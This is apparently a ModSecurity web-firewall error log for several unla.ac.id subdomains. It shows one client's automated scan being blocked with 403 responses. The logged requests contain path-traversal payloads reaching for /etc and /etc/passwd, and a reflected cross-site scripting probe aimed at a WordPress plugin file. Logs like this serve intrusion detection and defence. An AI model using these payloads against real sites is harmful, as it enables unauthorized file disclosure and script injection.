[Tue Aug 29 11:52:15.627579 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAfWOMsAAAAL"]
[Tue Aug 29 11:52:15.627836 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAnkwgkAAAAY"]
[Tue Aug 29 11:52:15.651775 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnkwgoAAAAY"]
[Tue Aug 29 11:52:16.547055 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAfWOM0AAAAL"]
[Tue Aug 29 11:52:16.589668 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlNwAAAAA"]
[Tue Aug 29 11:52:16.636660 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAjdQbgAAAAZ"]
[Tue Aug 29 11:52:16.637054 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlN0AAAAA"]
[Tue Aug 29 11:52:16.667867 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAn95-gAAAAD"]
[Tue Aug 29 11:52:16.669577 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlN4AAAAA"]
[Tue Aug 29 11:52:16.672249 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAjdQbkAAAAZ"]
[Tue Aug 29 11:52:16.715831 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAnIlp4AAAAV"]
[Tue Aug 29 11:52:16.717399 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAjdQboAAAAZ"]
[Tue Aug 29 11:52:16.722287 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download"] [unique_id "ZO15gMCo-f0AAAni-AcAAAAU"]
[Tue Aug 29 11:52:17.543967 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAni-AgAAAAU"]
[Tue Aug 29 11:52:17.555655 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQiUAAAAT"]
[Tue Aug 29 11:52:17.678370 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAn40zkAAAAW"]
[Tue Aug 29 11:52:17.687790 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnjjNgAAAAX"]
[Tue Aug 29 11:52:17.695835 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnoOqgAAAAf"]
[Tue Aug 29 11:52:17.704898 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnHQiYAAAAT"]
[Tue Aug 29 11:52:17.717775 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAni-AkAAAAU"]
[Tue Aug 29 11:52:17.743528 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnTlOEAAAAA"]
[Tue Aug 29 11:52:17.791835 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQicAAAAT"]
[Tue Aug 29 11:52:17.830681 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnHQigAAAAT"]
[Tue Aug 29 11:52:17.837082 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAn95-0AAAAD"]
[Tue Aug 29 11:52:17.863069 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download"] [unique_id "ZO15gcCo-f0AAAnHQikAAAAT"]
[Tue Aug 29 11:52:17.863648 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAni-AwAAAAU"]
[Tue Aug 29 11:52:17.880289 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAn95-8AAAAD"]
[Tue Aug 29 11:52:17.881358 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAnTlOQAAAAA"]
[Tue Aug 29 11:52:17.912098 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnTlOUAAAAA"]
[Tue Aug 29 11:52:17.912116 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAni-A4AAAAU"]
[Tue Aug 29 11:52:17.913406 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAn96AAAAAAD"]
[Tue Aug 29 11:52:17.929690 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQiwAAAAT"]
[Tue Aug 29 11:52:18.541191 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gsCo-f0AAAnTlOcAAAAA"]
[Tue Aug 29 11:52:18.554854 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gsCo-f0AAAn40z0AAAAW"]
[Tue Aug 29 11:52:18.578883 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn40z4AAAAW"]
[Tue Aug 29 11:52:18.608137 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gsCo-f0AAAn96AQAAAAD"]
[Tue Aug 29 11:52:18.628166 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gsCo-f0AAAnn2CwAAAAe"]
[Tue Aug 29 11:52:18.629447 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn96AUAAAAD"]
